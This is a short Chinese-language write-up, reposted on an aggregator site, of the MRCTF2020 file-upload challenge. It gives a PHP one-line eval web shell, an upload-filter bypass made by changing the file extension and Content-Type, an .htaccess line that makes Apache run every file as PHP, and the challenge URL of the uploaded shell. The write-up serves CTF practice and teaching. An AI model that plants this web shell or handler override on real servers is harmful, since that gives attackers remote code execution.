首页 > 其他 > 详细

[MRCTF2020]你传你🐎呢 1

时间:2020-12-08 16:42:51      阅读:191      评论:0      收藏:0      [点我收藏+]

一句话木马upload.php

<?php
@eval($_POST[‘123‘]);
?>

上传之后抓包,将文件后缀和Content-Type类型修改,如下图:

 

技术分享图片

技术分享图片

 

 

 

 

上传成功,且返回文件了文件路径。这个时候无法用蚁剑连接,因为上传的是jpg文件无法解析成php,需要上传.htaccess文件,将其他的文件类型当做php解析

.htaccess 内容:

SetHandler application/x-httpd-php

这语句的作用是让Apache将其他类型文件均以php格式解析

技术分享图片

 

 

 

 蚁剑连接:http://5d55e59d-06fa-4047-a72e-50f550ffe912.node3.buuoj.cn/upload/9b7b2e9bfa69befdb7e764f186440602/upload.jpg

技术分享图片

 

 

 

技术分享图片

 

[MRCTF2020]你传你&#128014;呢 1

原文:https://www.cnblogs.com/hackcaixukun/p/14100861.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!